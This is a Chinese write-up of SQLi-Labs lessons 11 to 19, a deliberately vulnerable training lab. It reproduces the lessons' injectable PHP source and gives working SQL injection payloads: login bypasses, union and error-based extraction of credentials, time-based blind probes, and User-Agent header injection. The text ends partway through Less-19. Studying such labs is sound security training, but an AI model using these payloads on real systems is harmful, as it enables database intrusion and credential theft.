antelope_
antelope_

SQLi-Labs 学习笔记(Less 11-20)

点击打开链接

Less-11 基于错误的POST型单引号字符型注入


先打开网页查看 Welcome Dhakkan

SQLi-Labs 学习笔记(Less 11-20)_第1张图片


②查看源代码:
[php]  view plain  copy
  1. "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
  2. "http://www.w3.org/1999/xhtml">  
  3.   
  4.     "Content-Type" content="text/html; charset=utf-8" />  
  5.     Less-11- Error Based- String  
  6.   
  7.   
  8. "#000000">  
  9. " margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  "#FF0000"> Dhakkan 
  
  •   
  • "center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">  
  •   
  • "padding-top:10px; font-size:15px;">  
  •    
  •   
  •   
  • "" name="form1" method="post">  
  •     "margin-top:15px; height:30px;">Username :      
  •         "text"  name="uname" value=""/>  
  •     
    •     
  •     
     Password  :      
  •         "text" name="passwd" value=""/>  
  •     

    •   
  •     " margin-top:9px;margin-left:90px;">  
  •         "submit" name="submit" value="Submit" />  
  •     
    •   
  •   
  •   
    •   
  •   
  • " margin-top:10px;color:#FFF; font-size:23px; text-align:center">  
  • "6" color="#FFFF00">  
  •   
  •   
  •   
  •   
  •   
  • //including the Mysql connect parameters.  
  • include("../sql-connections/sql-connect.php");  
  • error_reporting(0);  
  •   
  • // take the variables  
  • if(isset($_POST['uname']) && isset($_POST['passwd']))  
  • {  
  •     $uname=$_POST['uname'];  
  •     $passwd=$_POST['passwd'];  
  •   
  •     //logging the connection parameters to a file for analysis.  
  •     $fp=fopen('result.txt','a');  
  •     fwrite($fp,'User Name:'.$uname);  
  •     fwrite($fp,'Password:'.$passwd."\n");  
  •     fclose($fp);  
  •   
  •   
  •     // connectivity   
  •     @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";  
  •     $result=mysql_query($sql);  
  •     $row = mysql_fetch_array($result);  
  •   
  •     if($row)  
  •     {  
  •         //echo '';   
  •           
  •         echo "
    "    ;  
  •         echo '';  
  •         //echo " You Have successfully logged in\n\n " ;  
  •         echo '';     
  •         echo "
    "    ;  
  •         echo 'Your Login name:'$row['username'];  
  •         echo "
    "    ;  
  •         echo 'Your Password:' .$row['password'];  
  •         echo "
    "    ;  
  •         echo "";  
  •         echo "
    "    ;  
  •         echo "
    "    ;  
  •         echo '';   
  •           
  •         echo "";  
  •     }  
  •     else    
  •     {  
  •         echo '';  
  •         //echo "Try again looser";  
  •         print_r(mysql_error());  
  •         echo "
    "    ;  
  •         echo "
    "    ;  
  •         echo "
    "    ;  
  •         echo '';    
  •         echo "";    
  •     }  
  • }  
  •   
  • ?>  
  •   
  •   
  •   
    •   
  •   
  •   

    •
    我们来看一下这次是什么类型的提交,以及提交的字段是什么,打开网络查看器查看
    SQLi-Labs 学习笔记(Less 11-20)_第2张图片

    答案是POST提交,提交的字段是uname和passwd,那么我们加一个单引号让它报错:
    SQLi-Labs 学习笔记(Less 11-20)_第3张图片

    我们把 整个被单引号引着的复制下来,把左端和右端的单引号去掉,就变成下面的:
    [plain]  view plain  copy
    1. test' LIMIT 0,1  

    那么可以判断是单引号注入类型了,接下来构建 POST 提交
    [plain]  view plain  copy
    1. uname=user' or 1=1 #&passwd=user'  
    SQLi-Labs 学习笔记(Less 11-20)_第4张图片

    拿到用户名和密码了,登陆一下,成功登陆,当然除了用注释还可以闭合单引号,当这里有个问题探讨,看下图
    SQLi-Labs 学习笔记(Less 11-20)_第5张图片

    没有显示出来?我们看下 Sql 语句是什么样的:
    [plain]  view plain  copy
    1. SELECT username,password From users WHERE username='user' or '1'='1' and password='user' LIMIT 0,1  

    首先and的优先级高于or  【就是and先运算】,那么    '1'='1' and password='user' 先运算,因为users表里面的password字段没有一个数据是user,右边是false,那么整个表达式就是false,那么语句就变成:
    [plain]  view plain  copy
    1. SELECT username, password FROM users WHERE username='user' or false  

    所以我们要怎么办呢,uname这里不行,我们尝试passwd,发现是可以的
    SQLi-Labs 学习笔记(Less 11-20)_第6张图片

    对应的SQL语句是:
    [plain]  view plain  copy
    1. SELECT username,password FROM users WHERE username='user' and password='user' or '1'='1' LIMIT 0,1  

    左边是FALSE,or 右边是true,当然就绕过了,一般第一个登陆字段(一般是用户名)就用注释,第二个登陆字段(一般就密码)用闭合和注释都是可以的。

    接下类我们就可以使用 联合查询来看下数据库的信息:
    SQLi-Labs 学习笔记(Less 11-20)_第7张图片

    构建如下 POST字段:
    [plain]  view plain  copy
    1. uname=user&passwd=user' union select group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users#  
    SQLi-Labs 学习笔记(Less 11-20)_第8张图片

    当然,想用盲注也可以,就是要写脚本
    [plain]  view plain  copy
    1. uname=user&passwd=user' or length(database())=8#  


    SQLi-Labs 学习笔记(Less 11-20)_第9张图片



    Less-12 基于错误的双引号POST型字符型变形的注入

    先打开网页查看 Welcome Dhakkan
    SQLi-Labs 学习笔记(Less 11-20)_第10张图片


    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.       
    5.     Less-12- Error Based- Double quotes- String  
    6.   
    7.   
    8.   
    9.  Welcome   Dhakkan 
      
  •   
  •   
  •   
  •   
  •    
  •   
  •   
  •   
  •     Username :      
  •           
  •     
    •     
  •     
     Password  :      
  •           
  •     

    •   
  •       
  •           
  •     
    •   
  •   
  •   
    •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  • //including the Mysql connect parameters.  
  • include("../sql-connections/sql-connect.php");  
  • error_reporting(0);  
  •   
  • // take the variables  
  • if(isset($_POST['uname']) && isset($_POST['passwd']))  
  • {  
  •     $uname=$_POST['uname'];  
  •     $passwd=$_POST['passwd'];  
  •   
  •     //logging the connection parameters to a file for analysis.  
  •     $fp=fopen('result.txt','a');  
  •     fwrite($fp,'User Name:'.$uname."\n");  
  •     fwrite($fp,'Password:'.$passwd."\n");  
  •     fclose($fp);  
  •   
  •   
  •     // connectivity  
  •     $uname='"'.$uname.'"';  
  •     $passwd='"'.$passwd.'"';   
  •     @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";  
  •     $result=mysql_query($sql);  
  •     $row = mysql_fetch_array($result);  
  •   
  •     if($row)  
  •     {  
  •         //echo '';   
  •           
  •         echo "
    ";  
  •         echo '';  
  •         //echo " You Have successfully logged in " ;  
  •         echo '';     
  •         echo "
    ";  
  •         echo 'Your Login name:'. $row['username'];  
  •         echo "
    ";  
  •         echo 'Your Password:' .$row['password'];  
  •         echo "
    ";  
  •         echo "";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';      
  •           
  •         echo "";  
  •     }  
  •     else    
  •     {  
  •         echo '';  
  •         //echo "Try again looser";  
  •         print_r(mysql_error());  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';      
  •         echo "";    
  •     }  
  • }  
  •   
  • ?>  
  •   
  •   
  •   
  •   
  •   
  •   

    • 先用什么单引号双引号看看,报错就看出它有没有用引号,或者加了其他东西
    SQLi-Labs 学习笔记(Less 11-20)_第11张图片

    那么这里明显看出用)将变量括着,那么直接绕过,构建 POST 字段:
    [plain]  view plain  copy
    1. uname=abc&passwd=abc") or 1=1#  


    Less-13POST单引号变形双注入

    先打开网页查看 Welcome Dhakkan
    SQLi-Labs 学习笔记(Less 11-20)_第12张图片


    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.       
    5.     Less-13- Double Injection- String- with twist  
    6.   
    7.   
    8.   
    9.  Welcome   Dhakkan 
      
  •   
  •   
  •   
  •   
  •    
  •   
  •   
  •   
  •     Username :      
  •           
  •     
    •     
  •     
     Password  :      
  •           
  •     

    •   
  •       
  •           
  •     
    •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  • //including the Mysql connect parameters.  
  • include("../sql-connections/sql-connect.php");  
  • error_reporting(0);  
  •   
  • // take the variables  
  • if(isset($_POST['uname']) && isset($_POST['passwd']))  
  • {  
  •     $uname=$_POST['uname'];  
  •     $passwd=$_POST['passwd'];  
  •   
  •     //logging the connection parameters to a file for analysis.  
  •     $fp=fopen('result.txt','a');  
  •     fwrite($fp,'User Name:'.$uname."\n");  
  •     fwrite($fp,'Password:'.$passwd."\n");  
  •     fclose($fp);  
  •   
  •   
  •     // connectivity   
  •     @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";  
  •     $result=mysql_query($sql);  
  •     $row = mysql_fetch_array($result);  
  •   
  •     if($row)  
  •     {  
  •         //echo '';   
  •           
  •         echo "
    ";  
  •         echo '';  
  •         //echo " You Have successfully logged in " ;  
  •         echo '';     
  •         echo "
    ";  
  •         //echo 'Your Login name:'. $row['username'];  
  •         //echo "
    ";  
  •         //echo 'Your Password:' .$row['password'];  
  •         //echo "
    ";  
  •         echo "";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';      
  •           
  •         echo "";  
  •     }  
  •     else    
  •     {  
  •         echo '';  
  •         //echo "Try again looser";  
  •         print_r(mysql_error());  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';      
  •         echo "";    
  •     }  
  • }  
  •   
  • ?>  
  •   
  •   
  •   
  •   
  •   
  •   

    • 没多少区别,之前也讲过了,根据判断可以得知是 (' $id ') 类型的,那么
    SQLi-Labs 学习笔记(Less 11-20)_第13张图片


    Less-14POST单引号变形双注入

    先打开网页查看 Welcome Dhakkan
    SQLi-Labs 学习笔记(Less 11-20)_第14张图片


    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.       
    5.     Less-14- Double Injection- Double quotes- String  
    6.   
    7.   
    8.   
    9.  Welcome   Dhakkan 
      
  •   
  •   
  •   
  •   
  •    
  •   
  •   
  •   
  •     Username :      
  •           
  •         
  •     
     Password  :      
  •           
  •     
      
  •       
  •           
  •       
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  • //including the Mysql connect parameters.  
  • include("../sql-connections/sql-connect.php");  
  • error_reporting(0);  
  •   
  • // take the variables  
  • if(isset($_POST['uname']) && isset($_POST['passwd']))  
  • {  
  •     $uname=$_POST['uname'];  
  •     $passwd=$_POST['passwd'];  
  •   
  •     //logging the connection parameters to a file for analysis.  
  •     $fp=fopen('result.txt','a');  
  •     fwrite($fp,'User Name:'.$uname."\n");  
  •     fwrite($fp,'Password:'.$passwd."\n");  
  •     fclose($fp);  
  •   
  •   
  •     // connectivity  
  •     $uname='"'.$uname.'"';  
  •     $passwd='"'.$passwd.'"';   
  •     @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";  
  •     $result=mysql_query($sql);  
  •     $row = mysql_fetch_array($result);  
  •   
  •     if($row)  
  •     {  
  •         //echo '';   
  •           
  •         echo "
    ";  
  •         echo '';  
  •         //echo " You Have successfully logged in " ;  
  •         echo '';     
  •         echo "
    ";  
  •         //echo 'Your Login name:'. $row['username'];  
  •         //echo "
    ";  
  •         //echo 'Your Password:' .$row['password'];  
  •         //echo "
    ";  
  •         echo "";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';    
  •           
  •         echo "";  
  •     }  
  •     else    
  •     {  
  •         echo '';  
  •         //echo "Try again looser";  
  •         print_r(mysql_error());  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';   
  •         echo "";    
  •     }  
  • }  
  •   
  • ?>  
  •   
  •   
  •   
  •   
  •   
  •   

    • 单引号没报错,双引号就报错了,然后就不说了,都懂

    SQLi-Labs 学习笔记(Less 11-20)_第15张图片


    Less-15基于bool型/时间延迟单引号POST型盲注

    先打开网页查看 Welcome Dhakkan
    SQLi-Labs 学习笔记(Less 11-20)_第16张图片


    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.       
    5.     Less-15- Blind- Boolian Based- String  
    6.   
    7.   
    8.   
    9.  Welcome   Dhakkan 
      
  •   
  •   
  •   
  •   
  •    
  •   
  •   
  •   
  •     Username :      
  •           
  •     
    •     
  •     
     Password  :      
  •           
  •     

    •   
  •       
  •           
  •     
    •   
  •   
  •   
    •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  • //including the Mysql connect parameters.  
  • include("../sql-connections/sql-connect.php");  
  • error_reporting(0);  
  •   
  • // take the variables  
  • if(isset($_POST['uname']) && isset($_POST['passwd']))  
  • {  
  •     $uname=$_POST['uname'];  
  •     $passwd=$_POST['passwd'];  
  •   
  •     //logging the connection parameters to a file for analysis.  
  •     $fp=fopen('result.txt','a');  
  •     fwrite($fp,'User Name:'.$uname);  
  •     fwrite($fp,'Password:'.$passwd."\n");  
  •     fclose($fp);  
  •   
  •   
  •     // connectivity   
  •     @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";  
  •     $result=mysql_query($sql);  
  •     $row = mysql_fetch_array($result);  
  •   
  •     if($row)  
  •     {  
  •         //echo '';   
  •           
  •         echo "
    ";  
  •         echo '';  
  •         //echo " You Have successfully logged in\n\n " ;  
  •         echo '';     
  •         echo "
    ";  
  •         //echo 'Your Login name:'. $row['username'];  
  •         echo "
    ";  
  •         //echo 'Your Password:' .$row['password'];  
  •         echo "
    ";  
  •         echo "";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';   
  •           
  •         echo "";  
  •     }  
  •     else    
  •     {  
  •         echo '';  
  •         //echo "Try again looser";  
  •         //print_r(mysql_error());  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';      
  •         echo "";    
  •     }  
  • }  
  •   
  • ?>  
  •   
  •   
  •   
  •   
  •   
  •   

    • 这里输入单引号,双引号就不会报错了,用时间延迟函数了,先确定是单引号盲注:
    SQLi-Labs 学习笔记(Less 11-20)_第17张图片

    ok,没错。


    Less-16基于bool型/时间延迟的双引号POST型盲注

    先打开网页查看 Welcome Dhakkan
    SQLi-Labs 学习笔记(Less 11-20)_第18张图片

    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.       
    5.     Less-16- Blind- Time Based- Double quotes- String  
    6.   
    7.   
    8.   
    9.  Welcome   Dhakkan 
      
  •   
  •   
  •   
  •   
  •    
  •   
  •   
  •   
  •     Username :      
  •           
  •     
    •     
  •     
     Password  :      
  •           
  •     

    •   
  •       
  •           
  •     
    •   
  •   
  •   
    •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  • //including the Mysql connect parameters.  
  • include("../sql-connections/sql-connect.php");  
  • error_reporting(0);  
  •   
  • // take the variables  
  • if(isset($_POST['uname']) && isset($_POST['passwd']))  
  • {  
  •     $uname=$_POST['uname'];  
  •     $passwd=$_POST['passwd'];  
  •   
  •     //logging the connection parameters to a file for analysis.  
  •     $fp=fopen('result.txt','a');  
  •     fwrite($fp,'User Name:'.$uname."\n");  
  •     fwrite($fp,'Password:'.$passwd."\n");  
  •     fclose($fp);  
  •   
  •   
  •     // connectivity  
  •     $uname='"'.$uname.'"';  
  •     $passwd='"'.$passwd.'"';   
  •     @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";  
  •     $result=mysql_query($sql);  
  •     $row = mysql_fetch_array($result);  
  •   
  •     if($row)  
  •     {  
  •         //echo '';   
  •           
  •         echo "
    ";  
  •         echo '';  
  •         //echo " You Have successfully logged in " ;  
  •         echo '';     
  •         echo "
    ";  
  •         //echo 'Your Login name:'. $row['username'];  
  •         echo "
    ";  
  •         //echo 'Your Password:' .$row['password'];  
  •         echo "
    ";  
  •         echo "";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';   
  •           
  •         echo "";  
  •     }  
  •     else    
  •     {  
  •         echo '';  
  •         echo "
    ";  
  •         echo "
    ";  
  •         //echo "Try again looser";  
  •         //print_r(mysql_error());  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';   
  •         echo "";    
  •     }  
  • }  
  •   
  • ?>  
  •   
  •   
  •   
    •   
  •   
  •   

    • uname=a&passwd=a") or 1=1# ,判断为双引号变形,测试:
    uname=a&passwd=a")  or if(length(database())=7,1,sleep(5)) #
    uname=a&passwd=a")  or if(length(database())=8,1,sleep(5)) #

    SQLi-Labs 学习笔记(Less 11-20)_第19张图片


    Less-17基于错误的更新查询POST注入

    先打开网页查看 Welcome Dhakkan
    SQLi-Labs 学习笔记(Less 11-20)_第20张图片


    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-17 Update Query- Error based - String  
    6.   
    7.   
    8.   
    9.   
    10.  [PASSWORD RESET] 
         Dhakkan 
      
  •   
  •   
  •   
  •   
  •    
  •   
  •   
  •   
  •   
  •   User Name      :       
  •       
    •   
  •     
  •   
     New Password :      
  •     

    •   
  •       
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  • //including the Mysql connect parameters.  
  • include("../sql-connections/sql-connect.php");  
  • error_reporting(0);  
  •   
  • function check_input($value)  
  •     {  
  •     if(!empty($value))  
  •         {  
  •         // truncation (see comments)  
  •         $value = substr($value,0,15);  
  •         }  
  •   
  •         // Stripslashes if magic quotes enabled  
  •         if (get_magic_quotes_gpc())  
  •             {  
  •             $value = stripslashes($value);  
  •             }  
  •   
  •         // Quote if not a number  
  •         if (!ctype_digit($value))  
  •             {  
  •             $value = "'" . mysql_real_escape_string($value) . "'";  
  •             }  
  •           
  •     else  
  •         {  
  •         $value = intval($value);  
  •         }  
  •     return $value;  
  •     }  
  •   
  • // take the variables  
  • if(isset($_POST['uname']) && isset($_POST['passwd']))  
  •   
  • {  
  • //making sure uname is not injectable  
  • $uname=check_input($_POST['uname']);    
  •   
  • $passwd=$_POST['passwd'];  
  •   
  •   
  • //logging the connection parameters to a file for analysis.  
  • $fp=fopen('result.txt','a');  
  • fwrite($fp,'User Name:'.$uname."\n");  
  • fwrite($fp,'New Password:'.$passwd."\n");  
  • fclose($fp);  
  •   
  •   
  • // connectivity   
  • @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";  
  •   
  • $result=mysql_query($sql);  
  • $row = mysql_fetch_array($result);  
  • //echo $row;  
  •     if($row)  
  •     {  
  •         //echo '';   
  •         $row1 = $row['username'];     
  •         //echo 'Your Login name:'. $row1;  
  •         $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";  
  •         mysql_query($update);  
  •         echo "
    ";  
  •       
  •       
  •       
  •         if (mysql_error())  
  •         {  
  •             echo '';  
  •             print_r(mysql_error());  
  •             echo "

    ";  
  •             echo "";  
  •         }  
  •         else  
  •         {  
  •             echo '';  
  •             //echo " You password has been successfully updated " ;       
  •             echo "
    ";  
  •             echo "";  
  •         }  
  •       
  •         echo '';     
  •         //echo 'Your Password:' .$row['password'];  
  •         echo "";  
  •       
  •   
  •   
  •     }  
  •     else    
  •     {  
  •         echo '';  
  •         //echo "Bug off you Silly Dumb hacker";  
  •         echo "
    ";  
  •         echo '';  
  •       
  •         echo "";    
  •     }  
  • }  
  •   
  • ?>  
  •   
  •   
  •   
  •   
  •   
  •   


    •
    来分析一下代码,他的大概执行过程是接收到username和password后,首先根据username的值查询数据库返回username和password,然后再将原有的password值用接收到的值替换掉,这里有一个问题是,username在接收时用了一个自定义的过滤函数check_input(),这个函数首先做了判空处理,合法就截取username的前15个字符,然后是通过get_magic_quotes_gpc()的返回值判断magic_quotes_gpc的值是on还是off:

    magic_quotes_gpc=on时, 不用对输入和输出数据库的字符串数据作addslashes()和stripslashes()的操作,数据也会正常显示。如果此时对输入的数据作了addslashes()处理,那么在输出的时候就必须使用stripslashes()去掉多余的反斜杠。

    magic_quotes_gpc=off 时,必须使用addslashes()对输入数据进行处理,但并不需要使用stripslashes()格式化输出,因为addslashes()并未将反斜杠一起写入数据库,只是帮助mysql完成了sql语句的执行。

    最后,他用了ctype_digit()判断username值的类型是否是数字,是字符就用mysql_real_escape_string对特殊字符进行转义

    显然,username这里并不好注入,只有通过弱口令爆破,像是admin之类的,但是他对password的接收没有做过滤的处理,于是我们可以在这里动手脚
    [plain]  view plain  copy
    1. $uname=check_input($_POST['uname']);    
    2. $passwd=$_POST['passwd'];  
    对于update的注入有几种思路,我们将他连同insert和delete一起来总结一下:

    1、子查询注入

    子查询注入原理即双注入,对于dateup、delete和insert通常都是结合or的逻辑判断,本题为例我们对update可以构造如下语句

    获取数据库名:
    [plain]  view plain  copy
    1. uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x7e,0x27,database(),0x27,0x7e)),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23  
    SQLi-Labs 学习笔记(Less 11-20)_第21张图片

    获取表名:
    [plain]  view plain  copy
    1. uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,table_name,0x27,0x7e) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23  
    SQLi-Labs 学习笔记(Less 11-20)_第22张图片

    获取字段名:
    [plain]  view plain  copy
    1. uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23  
    SQLi-Labs 学习笔记(Less 11-20)_第23张图片

    获取用户信息,这里不知道为什么执行不成功:
    [plain]  view plain  copy
    1. uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x27,id,0x7e,username,0x7e,password,0x27) from users limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23  
    SQLi-Labs 学习笔记(Less 11-20)_第24张图片

    如果有哪位朋友知道怎么解决,麻烦在下面评论区提出解决方法,有可能是我mysql版本的问题吧。


    2、通过name_const():
    name_const( name , value ):返回给定值,当用来产生一个结果集合列时, name_ const ()促使该列使用给定名称,
    但他的使用范围受限,只适用于一些数据库版本高于5.0.12,但又稍旧的版本,像现在的5.7版本就不用想了...然而我用的就是较新的版本,注入只能显示数据库的版本信息,想要查询其他的信息,会显示Incorrect arguments to NAME_CONST,所以,这里我就不截图了,直接放payload:
    [plain]  view plain  copy
    1. uname=admin&passwd=1' or (select * from (select(name_const(database(),1)),name_const(database(),1))a) where username='admin'%23  
    [plain]  view plain  copy
    1. uname=admin&passwd=1' or (select * from (select(name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1)),name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1))a)  

    总的来说,对于update,insert和delete都有一个固定的结构:... or (select * from(select name_const((select ...),1),name_const((select...),1))a) ...

    3、通过updatexml():payload:updatexml(1,concat(0x7e,(version())),0)

    updatexml(xml_target,xpath_expr,new_xml)函数:

    第一个参数是 目标xml
    第二个参数是 xpath的表达式,这个看w3c那个xpath教程
    第三个参数是 要将xpath的表达式的东西将目标xml替换成什么

    xpath教程看这  http://www.w3school.com.cn/xpath/

    xml_target和new_xml参数随便设定一个数就行,这里主要让他报错

    首先获取数据库名:
    [plain]  view plain  copy
    1. uname=admin&passwd=' or updatexml(1,concat(0x7e,concat(database()),0x7e),1)#  
    SQLi-Labs 学习笔记(Less 11-20)_第25张图片

    获取表名:
    [plain]  view plain  copy
    1. uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#  
    SQLi-Labs 学习笔记(Less 11-20)_第26张图片

    获取字段名:
    [plain]  view plain  copy
    1. uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#  
    SQLi-Labs 学习笔记(Less 11-20)_第27张图片


    获取用户信息,当然这里也失败了:
    [plain]  view plain  copy
    1. uname=admin&passwd=' or updatexml(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e),0)#  


    [plain]  view plain  copy
    1. INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(  
    2. select b.n from (select concat_ws(char(32,44,32),id,username,password) n from users u where u.id=1)b  
    3. )),0) or'', 'Nervo');  
    4、通过extractvalue():

    extractvalue(xml,value)函数也是MYSQL5.1以后推出的对XML文档数据进行查询和修改的XPATH函数,注入时第一个参数随便给一个数字。 直接上payload:
    [plain]  view plain  copy
    1. uname=admin&passwd=' or extractvalue(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e))%23  


    Less-18基于错误的用户代理,头部POST注入

    先打开网页查看 Welcome Dhakkan
    SQLi-Labs 学习笔记(Less 11-20)_第28张图片


    ②查看源码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-18 Header Injection- Error Based- string  
    6.   
    7.   
    8.   
    9.   
    10.  Welcome    Dhakkan 
      
  •   
  •   
  •    
  •   
  •   
  •   
  •   
  •   Username :      
  •       
    •   
  •     
  •   
     Password :      
  •     

    •   
  •     
    •   
  •   
    •   
    •   
  •   
  •   
  •   
  •   
  •   
  • //including the Mysql connect parameters.  
  • include("../sql-connections/sql-connect.php");  
  • error_reporting(0);  
  •       
  • function check_input($value)  
  •     {  
  •     if(!empty($value))  
  •         {  
  •         // truncation (see comments)  
  •         $value = substr($value,0,20);  
  •         }  
  •   
  •         // Stripslashes if magic quotes enabled  
  •         if (get_magic_quotes_gpc())  
  •             {  
  •             $value = stripslashes($value);  
  •             }  
  •   
  •         // Quote if not a number  
  •         if (!ctype_digit($value))  
  •             {  
  •             $value = "'" . mysql_real_escape_string($value) . "'";  
  •             }  
  •           
  •     else  
  •         {  
  •         $value = intval($value);  
  •         }  
  •     return $value;  
  •     }  
  •   
  •   
  •   
  •     $uagent = $_SERVER['HTTP_USER_AGENT'];  
  •     $IP = $_SERVER['REMOTE_ADDR'];  
  •     echo "
    ";  
  •     echo 'Your IP ADDRESS is: ' .$IP;  
  •     echo "
    ";  
  •     //echo 'Your User Agent is: ' .$uagent;  
  • // take the variables  
  • if(isset($_POST['uname']) && isset($_POST['passwd']))  
  •   
  •     {  
  •     $uname = check_input($_POST['uname']);  
  •     $passwd = check_input($_POST['passwd']);  
  •       
  •     /*  
  •     echo 'Your Your User name:'. $uname;  
  •     echo "
    ";  
  •     echo 'Your Password:'. $passwd;  
  •     echo "
    ";  
  •     echo 'Your User Agent String:'. $uagent;  
  •     echo "
    ";  
  •     echo 'Your User Agent String:'. $IP;  
  •     */  
  •   
  •     //logging the connection parameters to a file for analysis.   
  •     $fp=fopen('result.txt','a');  
  •     fwrite($fp,'User Agent:'.$uname."\n");  
  •       
  •     fclose($fp);  
  •       
  •       
  •       
  •     $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";  
  •     $result1 = mysql_query($sql);  
  •     $row1 = mysql_fetch_array($result1);  
  •         if($row1)  
  •             {  
  •             echo '';  
  •             $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";  
  •             mysql_query($insert);  
  •             //echo 'Your IP ADDRESS is: ' .$IP;  
  •             echo "";  
  •             //echo "
    ";  
  •             echo '';              
  •             echo 'Your User Agent is: ' .$uagent;  
  •             echo "";  
  •             echo "
    ";  
  •             print_r(mysql_error());           
  •             echo "

    ";  
  •             echo '';  
  •             echo "
    ";  
  •               
  •             }  
  •         else  
  •             {  
  •             echo '';  
  •             //echo "Try again looser";  
  •             print_r(mysql_error());  
  •             echo "
    ";           
  •             echo "
    ";  
  •             echo '';      
  •             echo "";    
  •             }  
  •   
  •     }  
  •   
  • ?>  
  •   
  •   
  •   
  •   
  •   
  •   

    • 对uname和passwd进行了check_input()函数的处理,所以我们在输入uname和passwd上进行注入是不行的,但

    是在代码中,我们看到了insert()

    [plain]  view plain  copy
    1. $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";  

    将useragent和ip插入到数据库中,那么我们是不是可以用这个来进行注入呢?Ip地址我们这里修改不是很方便,但是useragent修改较为方便,我们从useragent入手。


    那么用什么工具手注呢,burp的repeater非常方便,用火狐的某些插件应该也可以如live http headers,tamper data,下面我用 burp suite 来演示


     首先这里要输入正确的账号和密码才能绕过账号密码判断,进入处理uagent部分,这里跟我们现实中的注册登录再注入是比较贴合,这里我们输入正确的账号密码就输出我们的uagent
    SQLi-Labs 学习笔记(Less 11-20)_第29张图片

    接下来,利用 Burp suite 抓包改包,获取数据库名称,有很多种方式,构建语句:
    [plain]  view plain  copy
    1. ' or updatexml(1,concat(0x2b5e,database()),0) or '  
    2. ‘and extractvalue(1,concat(0x7e,(database())) and ‘1‘=‘1  
    SQLi-Labs 学习笔记(Less 11-20)_第30张图片

    就不按步骤来了,直接获取用户名和密码信息:
    [plain]  view plain  copy
    1. ' or updatexml(1,concat(0x2b5e,(select concat_ws(0x2b5e,id,username,password) from users limit 0,1)),0) or '  
    SQLi-Labs 学习笔记(Less 11-20)_第31张图片



    Less-19基于头部的Referer POST报错

    先打开网页查看 Welcome Dhakkan
    SQLi-Labs 学习笔记(Less 11-20)_第32张图片


    ②查看源代码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5. Less-19 Header Injection- Referer- Error Based- string  
    6.   
    7.   
    8.   
    9.   
    10.  Welcome    Dhakkan 
      
  •   
  •   
  •    
  •   
  •   
  •   
  •   
  •   Username :      
  •         
  •     
  •   
     Password :      
  •     
      
  •       
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  •   
  • //including the Mysql connect parameters.  
